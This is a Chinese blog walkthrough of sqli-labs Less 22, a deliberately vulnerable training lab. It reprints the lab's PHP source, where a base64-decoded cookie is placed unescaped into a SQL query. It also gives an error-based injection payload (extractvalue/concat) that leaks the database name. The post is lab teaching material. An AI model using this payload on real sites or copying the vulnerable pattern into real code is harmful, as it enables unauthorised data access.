程序员经验分享-hwhale

sqli-labs————less 22

2023-10-26

Less 22


简单测试:

username:admin

password:aaa


查看一下源代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Less-22 Cookie Injection- Error Based- Double Quotes - string</title>
</head>

<body bgcolor="#000000">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if(!isset($_COOKIE['uname']))
	{
	//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");

	echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>";
	echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
	echo "<div style='padding-top:10px; font-size:15px;'>";
 
	echo "<!--Form to post the contents -->";
	echo '<form action=" " name="form1" method="post">';

	echo ' <div style="margin-top:15px; height:30px;">Username :    ';
	echo '   <input type="text"  name="uname" value=""/>  </div>';
  
	echo ' <div> Password :      ';
	echo '   <input type="text" name="passwd" value=""/></div></br>';	
	echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';

	echo '</form>';
	echo '</div>';
	echo '</div>';
	echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
	echo '<font size="3" color="#FFFF00">';
	echo '<center><br><br><br>';
	echo '<img src="../images/Less-22.jpg" />';
	echo '</center>';
	
function check_input($value)
	{
	if(!empty($value))
		{
		$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
			{
			$value = stripslashes($value);
			}
		if (!ctype_digit($value))   	// Quote if not a number
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	else
		{
		$value = intval($value);
		}
	return $value;
	}	
	echo "<br>";
	echo "<br>";
	
	if(isset($_POST['uname']) && isset($_POST['passwd']))
		{
		$uname = check_input($_POST['uname']);
		$passwd = check_input($_POST['passwd']);	
		$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
		$result1 = mysql_query($sql);
		$row1 = mysql_fetch_array($result1);
			if($row1)
				{
				echo '<font color= "#FFFF00" font size = 3 >';
				setcookie('uname', base64_encode($row1['username']), time()+3600);	
				header ('Location: index.php');
				echo "I LOVE YOU COOKIES";
				echo "</font>";
				echo '<font color= "#0000ff" font size = 3 >';			
				//echo 'Your Cookie is: ' .$cookee;
				echo "</font>";
				echo "<br>";
				print_r(mysql_error());			
				echo "<br><br>";
				echo '<img src="../images/flag.jpg" />';
				echo "<br>";
				}
			else
				{
				echo '<font color= "#0000ff" font size="3">';
				//echo "Try again looser";
				print_r(mysql_error());
				echo "</br>";			
				echo "</br>";
				echo '<img src="../images/slap.jpg" />';	
				echo "</font>";  
				}
			}
		
			echo "</font>";  
	echo '</font>';
	echo '</div>';

}
else
{
	if(!isset($_POST['submit']))
	{
			$cookee = $_COOKIE['uname'];
			$format = 'D d M Y - H:i:s';
			$timestamp = time() + 3600;
			echo "<center>";
			echo "<br><br><br><b>";
			echo '<img src="../images/Less-21.jpg" />';
			echo "<br><br><b>";
			echo '<br><font color= "red" font size="4">';	
			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
			echo "</font><br>";	
			echo '<font color= "cyan" font size="4">';	
			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			
			echo "</font><br>";			
			echo '<font color= "#FFFF00" font size = 4 >';
			echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
			echo '<font color= "orange" font size = 5 >';			
			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
			
			$cookee = base64_decode($cookee);
			$cookee1 = '"'. $cookee. '"';
			echo "<br></font>";
			$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
			$result=mysql_query($sql);
			if (!$result)
  				{
  				die('Issue with your mysql: ' . mysql_error());
  				}
			$row = mysql_fetch_array($result);
			if($row)
				{
			  	echo '<font color= "pink" font size="5">';	
			  	echo 'Your Login name:'. $row['username'];
			  	echo "<br>";
				echo '<font color= "grey" font size="5">';  	
				echo 'Your Password:' .$row['password'];
			  	echo "</font></b>";
				echo "<br>";
				echo 'Your ID:' .$row['id'];
			  	}
			else	
				{
				echo "<center>";
				echo '<br><br><br>';
				echo '<img src="../images/slap1.jpg" />';
				echo "<br><br><b>";
				//echo '<img src="../images/Less-20.jpg" />';
				}
			echo '<center>';
			echo '<form action="" method="post">';
			echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
			echo '</form>';
			echo '</center>';
		}	
	else
		{
		echo '<center>';
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo '<font color= "#FFFF00" font size = 6 >';
		echo " Your Cookie is deleted";
				setcookie('uname', base64_encode($row1['username']), time()-3600);
				header ('Location: index.php');
		echo '</font></center></br>';
		
		}		
			echo "<br>";
			echo "<br>";
			//header ('Location: main.php');
			echo "<br>";
			echo "<br>";
			
			//echo '<img src="../images/slap.jpg" /></center>';
			//logging the connection parameters to a file for analysis.	
		$fp=fopen('result.txt','a');
		fwrite($fp,'Cookie:'.$cookee."\n");
	
		fclose($fp);
	
}
?>
</body>
</html>

这关和less 21、20差不多,我们可以从源代码中看到,这里对uname进行“uname”处理,我们可以构造payload如下:

admin1"and extractvalue(1,concat(0x7e,(select database()),0x7e))#

这里的payload还是传入cookie中,而且还是需要base64加密之后再传入哦!

其余的内容不再多做介绍!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Sqlilabs实战

渗透测试实战

sqli-labs————less 22 的相关文章

  • windows 执行bat脚本

    bat脚本中运行另外一个bat脚本 call 命令 call1 bat内容如下 echo running call1 call2 bat内容如下 echo off echo start call call1 bat echo running

  • Ogre 界面(Overlay)

    Ogre 界面 Overlay 标签 border脚本buttontemplatesplugins引擎 2011 10 16 23 12 4725人阅读 评论 2 收藏 举报 分类 引擎技术 9 这里的界面是指菜单 HUD及提示信息框在内的

  • 各个join区别

    在数学中 笛卡尔乘积是指两个集合X和Y的笛卡尓积 Cartesian product 又称直积 表示为X Y 第一个对象是X的成员而第二个对象是Y的所有可能有序对的其中一个成员 假设集合A a b 集合B 0 1 2 则两个集合的笛卡尔积为

  • 基于MATLAB的几种图像分割算法

    最大类间方差法 基本思路是根据直方图以某一会灰度为阈值将图像分割成两部分 计算两组的方差 当被分成的两组之间的方差最大时 这个灰度为阈值灰度值 img imread C Users dell Desktop 前单图 3 3 JPG 原图 I

  • 最新版本Android-Studio2.1.2 Windows7 64bit系统下搭建Android开发环境

    windows7 64bit系统下搭建Android开发环境 最新版本Android Studio2 1 2 注 现在在使用i MX6Q开发板做嵌入式系统开发 跑的是Android系统 想在开发板写一些测试程序 因此搭建了Android开发

  • FreeRTOS 事件组

    实现功能 当任务A B完成后执行串口任务 不同任务用不同的位表示 configUSE 16 BIT TICKS 1 bitx 0 7 configUSE 16 BIT TICKS设置为0 bitx 0 23 串口任务的头文件 ifndef

  • QNX操作系统简介

    QNX是商业类Unix实时操作系统 主要针对嵌入式系统市场 该产品开发于20世纪80年代初 后来改名为QNX软件系统公司 QNX软件系统公司 黑莓公司旗下子公司 是全球领先的创新嵌入式技术供应商 包括中间件 开发工具和操作系统 QNX Ne

  • Django配置mysql数据库

    默认使用SQLite3数据库 1 本地已安装mysql数据库 或者使用已存在的数据库 创建表空间 存放项目中的表 create database bobmydata show databases 2 安装数据连接工具PyMySQL pip

  • eclipse中jsp自动提示慢的问题

    这几天用eclipse编写jsp代码 发现点了 引导符后 系统提供的自动提示出奇的慢 于是开始网络求助 搞清了原因 eclipse在编写jsp时 当点下引导符后 要去相应的javadoc 中寻找相应的解释 而他默认的寻找路径是 sun的网站

  • Kernel panic - not syncing: Requested init /linuxrc failed (error -13).

    开发板平台exynos 4413 使用busybox 1 31 1制作ext4根文件系统 Kernel panic not syncing Requested init linuxrc failed error 13 这是一个巨坑无比的错误

  • Spring IOC容器的创建过程

    在测试时 经常使用这种方式来创建spring容器 创建基于注解的springIOC容器 ApplicationContext applicationContext new AnnotationConfigApplicationContext

  • unity SteamVR Plugin导入后的两个错误的解决办法

    在unity asset store中搜索 SteamVR Plugin 找到官方提供的插件 我当时下载到的版本是1 2 1的 下载完后导入到工程里 打开里面的样例场景 共3个 运行或停止运行时会明显卡顿 报错 其中一个错误 Unity S

  • 13位10位时间戳转换日期

    工具类 时间转换 一 10位13位时间戳转String 格式 2018 10 15 16 03 27 日期 10位13位时间戳转String 格式 2018 10 15 16 03 27 日期 param timestamp param s

  • C语言:一级指针,二级指针,三级指针,指针数组,数组指针的综合示例

    本博客主要介绍一级指针 二级指针 三级指针 指针数组和数组指针的综合应用示例 下面简单介绍指针数组和数组指针的区别 指针数组 char p aaa bbbb 定义了一个数组p p中每一个元素都是一个指针 数组指针 char p 5 定义了一

随机推荐

  • windows10 Linux子系统(wsl)文件目录

    简介 使用window中的Linux子系统创建的文件究竟放在什么地方 既然作为子系统文件肯定是可以互相访问的 windows访问Linux目录 wsl ubuntu Linux子系统的目录是在这个目录下 C Users 用户名 AppDat

  • OpenGL加速渲染:顶点数组

    加速渲染主要有两种方法 显示列表与顶点数组 其中 显示列表是通过预编译方式加速 而顶点数组是通过优化实时编译方式加速 但是 不需要同时使用两种加速方式 如果把顶点数组放在预编译中 然后通过显示列表来显示 这样做所耗时间与直接使用顶点数组所耗

  • java实现Date和Timestamp的相互转换

    Date转Timestamp 一句搞定 Timestamp createTime new Timestamp new Date getTime Timestamp转Date Timestamp t new Timestamp System

  • 飞机大战

    目录 一 效果图 https www bilibili com video BV1cT4y1Z7f3 二 学习参考资料 b站up主 鱼C 小甲鱼 Python教程 零基础入门学习Python 三 代码框架 这里只是给出了功能描述 给出了一个

  • Struts2详解

    struts2框架是SSH框架集中的框架之一 是一个基于MVC设计模式的Web应用框架 它本质上相当于一个servlet 在MVC设计模式中 Struts2作为控制器层 Controller 来建立模型与视图的数据交互 在使用struts2

  • SpringBoot整合grpc

    grpc简介 gRPC gRPC Remote Procedure Calls 是 Google 发起的一个开源远程过程调用系统 该系统基于 HTTP 2 协议传输 摘自知乎 https zhuanlan zhihu com p 38932

  • QT VS中双击ui文件无法打开的问题

    如果你在VS里安装QT之后 双击ui文件 出现闪退并且显示xxx ui文件无法打开 这篇博客或许能帮助到你 一 问题描述 双击ui文件出现闪退 如下图所示 这个界面1s之后就会闪退 二 解决方案 步骤1 步骤2 一 问题描述 双击ui文件出

  • 【Java基础】Date类、DateFormat类

    目录 一 Date类 二 DateFormat类 1 format方法 2 parse方法 一 Date类 data 翻译成中文是 日期 的意思 在Java里面Data类表示特定的瞬间 精确到毫秒 创建data对象 不初始化即表示为当前系统

  • 原型模式

    原型模式 根据实际案例分析原型模式的优点 浅克隆 代码示例 测试分析 深克隆 代码示例 测试 分析原型模式的优点 Spring框架中原型模式案例 业务与原型模式的落地示例 根据实际案例分析原型模式的优点 在传统模式下 假设需要克隆对象 动态

  • Unity3D Texture to Sprite

    unity3d中截屏转化为sprite using UnityEngine using System Collections using UnityEngine UI public class Demo MonoBehaviour publ

  • vue实现下载文件

    最最简单的vue实现下载文件 用vue实现调取后端接口从服务器下载文件 话不多说直接上代码 1 首先第一步改下axios的配置 const axios axios create config axios interceptors reque

  • HTTP

    一 安全特性 在上篇文章中 我们了解到HTTP在通信过程中 存在以下问题 通信使用明文 不加密 内容可能被窃听 不验证通信方的身份 因此有可能遭遇伪装 而HTTPS的出现正是解决这些问题 HTTPS是建立在SSL之上 其安全性由SSL来保证

  • 【插件】谷歌浏览器插件 visio在线打开vsdx文件 .vsdx文件在线查看

    提供一个下载地址 谷歌插件下载 步骤1 输入 visio viewer 2 选择版本 我选择的是V4 4 点击下载 3 根据123步骤点击进入扩展程序 4 打开刚才下载的文件并解压 解压后打开找到crx结尾的文件 把该文件拖入扩展程序 点击

  • IDEA的下载和使用安装

    一 IDEA的下载 IDEA下载地址 https www jetbrains com idea download section windows IDEA 分为两个版本 旗舰版 Ultimate 和社区版 Community 二 安装过程

  • 射频中的 S参数 总结

    S参数简介 S参数 也就是散射参数 是微波传输中的一个重要参数 S12为反向传输系数 也就是隔离 S21为正向传输系数 也就是增益 S11为输入反射系数 也就是输入回波损耗 S22为输出反射系数 也就是输出回波损耗 S参数作为描述线性无源传

  • typescript 基础类型注解

    TypeScript 基础类型 序号 数据类型 关键字 描述 1 任意 any 声明为 any 的变量可以赋予任意类型的值 2 数值 number 双精度 64 位浮点值 它可以用来表示整数和分数 3 字符串 string 一个字符系列 使

  • Qt中QPushButton设置按钮的文本位置

    特定样式 引言 解决方法 总结 引言 今天碰到一个动态创建的QPushButton添加到布局中 我需要设置按钮的文本距离边框的距离 按照以往自己设置的与边框的距离的方式设置的样式 没有起到任何作用 前提是 qss文件能正常加载 其它控件都正

  • Qt中对TCP粘包的处理

    当时用TCP协议传输数据时 经常出现粘包的现象 当服务器向客户端发送数据之后 客户端还没有接收数据的时候 这段时间数据在什么地方 1 服务器 服务器已经发出数据了 2 网线 数据应该在内存 怎么会在网线里面 又没有内存 3 客户端 是的 这

  • GoFrame框架入门教程一(下载框架)

    本地环境 1 Windows 2 go版本 1 17 3 编辑器 GoLand 2021 3 2 新建项目 Environment 处填写 GOPROXY https goproxy cn 使用 go mod文件管理项目包 module g

  • sqli-labs————less 22

    Less 22 简单测试 username admin password aaa 查看一下源代码如下

热门标签